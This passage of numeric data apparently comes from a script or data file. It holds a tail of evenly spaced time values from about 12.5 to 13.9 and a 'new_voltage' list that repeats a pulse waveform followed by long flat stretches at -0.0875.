12.497, 12.499, 12.5, 12.501, 12.503, 12.504, 12.506, 12.507, 12.508, 12.51, 12.511, 12.512, 12.514, 12.515, 12.517, 12.518, 12.519, 12.521, 12.522, 12.524, 12.525, 12.526, 12.528, 12.529, 12.531, 12.532, 12.533, 12.535, 12.536, 12.537, 12.539, 12.54, 12.542, 12.543, 12.544, 12.546, 12.547, 12.549, 12.55, 12.551, 12.553, 12.554, 12.556, 12.557, 12.558, 12.56, 12.561, 12.562, 12.564, 12.565, 12.567, 12.568, 12.569, 12.571, 12.572, 12.574, 12.575, 12.576, 12.578, 12.579, 12.581, 12.582, 12.583, 12.585, 12.586, 12.588, 12.589, 12.59, 12.592, 12.593, 12.594, 12.596, 12.597, 12.599, 12.6, 12.601, 12.603, 12.604, 12.606, 12.607, 12.608, 12.61, 12.611, 12.613, 12.614, 12.615, 12.617, 12.618, 12.619, 12.621, 12.622, 12.624, 12.625, 12.626, 12.628, 12.629, 12.631, 12.632, 12.633, 12.635, 12.636, 12.637, 12.639, 12.64, 12.642, 12.643, 12.644, 12.646, 12.647, 12.649, 12.65, 12.651, 12.653, 12.654, 12.656, 12.657, 12.658, 12.66, 12.661, 12.662, 12.664, 12.665, 12.667, 12.668, 12.669, 12.671, 12.672, 12.674, 12.675, 12.676, 12.678, 12.679, 12.681, 12.682, 12.683, 12.685, 12.686, 12.688, 12.689, 12.69, 12.692, 12.693, 12.694, 12.696, 12.697, 12.699, 12.7, 12.701, 12.703, 12.704, 12.706, 12.707, 12.708, 12.71, 12.711, 12.713, 12.714, 12.715, 12.717, 12.718, 12.719, 12.721, 12.722, 12.724, 12.725, 12.726, 12.728, 12.729, 12.731, 12.732, 12.733, 12.735, 12.736, 12.738, 12.739, 12.74, 12.742, 12.743, 12.744, 12.746, 12.747, 12.749, 12.75, 12.751, 12.753, 12.754, 12.756, 12.757, 12.758, 12.76, 12.761, 12.762, 12.764, 12.765, 12.767, 12.768, 12.769, 12.771, 12.772, 12.774, 12.775, 12.776, 12.778, 12.779, 12.781, 12.782, 12.783, 12.785, 12.786, 12.787, 12.789, 12.79, 12.792, 12.793, 12.794, 12.796, 12.797, 12.799, 12.8, 12.801, 12.803, 12.804, 12.806, 12.807, 12.808, 12.81, 12.811, 12.812, 12.814, 12.815, 12.817, 12.818, 12.819, 12.821, 12.822, 12.824, 12.825, 12.826, 12.828, 12.829, 12.831, 12.832, 12.833, 12.835, 12.836, 12.838, 12.839, 12.84, 12.842, 12.843, 12.844, 12.846, 12.847, 12.849, 12.85, 12.851, 12.853, 12.854, 12.856, 12.857, 12.858, 12.86, 12.861, 12.863, 12.864, 12.865, 12.867, 12.868, 12.869, 12.871, 12.872, 12.874, 12.875, 12.876, 12.878, 12.879, 12.881, 12.882, 12.883, 12.885, 12.886, 12.887, 12.889, 12.89, 12.892, 12.893, 12.894, 12.896, 12.897, 12.899, 12.9, 12.901, 12.903, 12.904, 12.906, 12.907, 12.908, 12.91, 12.911, 12.912, 12.914, 12.915, 12.917, 12.918, 12.919, 12.921, 12.922, 12.924, 12.925, 12.926, 12.928, 12.929, 12.931, 12.932, 12.933, 12.935, 12.936, 12.938, 12.939, 12.94, 12.942, 12.943, 12.944, 12.946, 12.947, 12.949, 12.95, 12.951, 12.953, 12.954, 12.956, 12.957, 12.958, 12.96, 12.961, 12.963, 12.964, 12.965, 12.967, 12.968, 12.969, 12.971, 12.972, 12.974, 12.975, 12.976, 12.978, 12.979, 12.981, 12.982, 12.983, 12.985, 12.986, 12.988, 12.989, 12.99, 12.992, 12.993, 12.994, 12.996, 12.997, 12.999, 13.0, 13.001, 13.003, 13.004, 13.006, 13.007, 13.008, 13.01, 13.011, 13.012, 13.014, 13.015, 13.017, 13.018, 13.019, 13.021, 13.022, 13.024, 13.025, 13.026, 13.028, 13.029, 13.031, 13.032, 13.033, 13.035, 13.036, 13.037, 13.039, 13.04, 13.042, 13.043, 13.044, 13.046, 13.047, 13.049, 13.05, 13.051, 13.053, 13.054, 13.056, 13.057, 13.058, 13.06, 13.061, 13.062, 13.064, 13.065, 13.067, 13.068, 13.069, 13.071, 13.072, 13.074, 13.075, 13.076, 13.078, 13.079, 13.081, 13.082, 13.083, 13.085, 13.086, 13.088, 13.089, 13.09, 13.092, 13.093, 13.094, 13.096, 13.097, 13.099, 13.1, 13.101, 13.103, 13.104, 13.106, 13.107, 13.108, 13.11, 13.111, 13.113, 13.114, 13.115, 13.117, 13.118, 13.119, 13.121, 13.122, 13.124, 13.125, 13.126, 13.128, 13.129, 13.131, 13.132, 13.133, 13.135, 13.136, 13.137, 13.139, 13.14, 13.142, 13.143, 13.144, 13.146, 13.147, 13.149, 13.15, 13.151, 13.153, 13.154, 13.156, 13.157, 13.158, 13.16, 13.161, 13.162, 13.164, 13.165, 13.167, 13.168, 13.169, 13.171, 13.172, 13.174, 13.175, 13.176, 13.178, 13.179, 13.181, 13.182, 13.183, 13.185, 13.186, 13.188, 13.189, 13.19, 13.192, 13.193, 13.194, 13.196, 13.197, 13.199, 13.2, 13.201, 13.203, 13.204, 13.206, 13.207, 13.208, 13.21, 13.211, 13.213, 13.214, 13.215, 13.217, 13.218, 13.219, 13.221, 13.222, 13.224, 13.225, 13.226, 13.228, 13.229, 13.231, 13.232, 13.233, 13.235, 13.236, 13.238, 13.239, 13.24, 13.242, 13.243, 13.244, 13.246, 13.247, 13.249, 13.25, 13.251, 13.253, 13.254, 13.256, 13.257, 13.258, 13.26, 13.261, 13.262, 13.264, 13.265, 13.267, 13.268, 13.269, 13.271, 13.272, 13.274, 13.275, 13.276, 13.278, 13.279, 13.281, 13.282, 13.283, 13.285, 13.286, 13.287, 13.289, 13.29, 13.292, 13.293, 13.294, 13.296, 13.297, 13.299, 13.3, 13.301, 13.303, 13.304, 13.306, 13.307, 13.308, 13.31, 13.311, 13.312, 13.314, 13.315, 13.317, 13.318, 13.319, 13.321, 13.322, 13.324, 13.325, 13.326, 13.328, 13.329, 13.331, 13.332, 13.333, 13.335, 13.336, 13.338, 13.339, 13.34, 13.342, 13.343, 13.344, 13.346, 13.347, 13.349, 13.35, 13.351, 13.353, 13.354, 13.356, 13.357, 13.358, 13.36, 13.361, 13.363, 13.364, 13.365, 13.367, 13.368, 13.369, 13.371, 13.372, 13.374, 13.375, 13.376, 13.378, 13.379, 13.381, 13.382, 13.383, 13.385, 13.386, 13.387, 13.389, 13.39, 13.392, 13.393, 13.394, 13.396, 13.397, 13.399, 13.4, 13.401, 13.403, 13.404, 13.406, 13.407, 13.408, 13.41, 13.411, 13.412, 13.414, 13.415, 13.417, 13.418, 13.419, 13.421, 13.422, 13.424, 13.425, 13.426, 13.428, 13.429, 13.431, 13.432, 13.433, 13.435, 13.436, 13.438, 13.439, 13.44, 13.442, 13.443, 13.444, 13.446, 13.447, 13.449, 13.45, 13.451, 13.453, 13.454, 13.456, 13.457, 13.458, 13.46, 13.461, 13.463, 13.464, 13.465, 13.467, 13.468, 13.469, 13.471, 13.472, 13.474, 13.475, 13.476, 13.478, 13.479, 13.481, 13.482, 13.483, 13.485, 13.486, 13.488, 13.489, 13.49, 13.492, 13.493, 13.494, 13.496, 13.497, 13.499, 13.5, 13.501, 13.503, 13.504, 13.506, 13.507, 13.508, 13.51, 13.511, 13.512, 13.514, 13.515, 13.517, 13.518, 13.519, 13.521, 13.522, 13.524, 13.525, 13.526, 13.528, 13.529, 13.531, 13.532, 13.533, 13.535, 13.536, 13.537, 13.539, 13.54, 13.542, 13.543, 13.544, 13.546, 13.547, 13.549, 13.55, 13.551, 13.553, 13.554, 13.556, 13.557, 13.558, 13.56, 13.561, 13.562, 13.564, 13.565, 13.567, 13.568, 13.569, 13.571, 13.572, 13.574, 13.575, 13.576, 13.578, 13.579, 13.581, 13.582, 13.583, 13.585, 13.586, 13.588, 13.589, 13.59, 13.592, 13.593, 13.594, 13.596, 13.597, 13.599, 13.6, 13.601, 13.603, 13.604, 13.606, 13.607, 13.608, 13.61, 13.611, 13.613, 13.614, 13.615, 13.617, 13.618, 13.619, 13.621, 13.622, 13.624, 13.625, 13.626, 13.628, 13.629, 13.631, 13.632, 13.633, 13.635, 13.636, 13.637, 13.639, 13.64, 13.642, 13.643, 13.644, 13.646, 13.647, 13.649, 13.65, 13.651, 13.653, 13.654, 13.656, 13.657, 13.658, 13.66, 13.661, 13.662, 13.664, 13.665, 13.667, 13.668, 13.669, 13.671, 13.672, 13.674, 13.675, 13.676, 13.678, 13.679, 13.681, 13.682, 13.683, 13.685, 13.686, 13.688, 13.689, 13.69, 13.692, 13.693, 13.694, 13.696, 13.697, 13.699, 13.7, 13.701, 13.703, 13.704, 13.706, 13.707, 13.708, 13.71, 13.711, 13.713, 13.714, 13.715, 13.717, 13.718, 13.719, 13.721, 13.722, 13.724, 13.725, 13.726, 13.728, 13.729, 13.731, 13.732, 13.733, 13.735, 13.736, 13.738, 13.739, 13.74, 13.742, 13.743, 13.744, 13.746, 13.747, 13.749, 13.75, 13.751, 13.753, 13.754, 13.756, 13.757, 13.758, 13.76, 13.761, 13.762, 13.764, 13.765, 13.767, 13.768, 13.769, 13.771, 13.772, 13.774, 13.775, 13.776, 13.778, 13.779, 13.781, 13.782, 13.783, 13.785, 13.786, 13.787, 13.789, 13.79, 13.792, 13.793, 13.794, 13.796, 13.797, 13.799, 13.8, 13.801, 13.803, 13.804, 13.806, 13.807, 13.808, 13.81, 13.811, 13.812, 13.814, 13.815, 13.817, 13.818, 13.819, 13.821, 13.822, 13.824, 13.825, 13.826, 13.828, 13.829, 13.831, 13.832, 13.833, 13.835, 13.836, 13.838, 13.839, 13.84, 13.842, 13.843, 13.844, 13.846, 13.847, 13.849, 13.85, 13.851, 13.853, 13.854, 13.856, 13.857, 13.858, 13.86, 13.861, 13.863, 13.864, 13.865, 13.867, 13.868, 13.869, 13.871, 13.872, 13.874, 13.875, 13.876, 13.878, 13.879, 13.881, 13.882, 13.883, 13.885, 13.886, 13.887]
new_voltage = [-0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 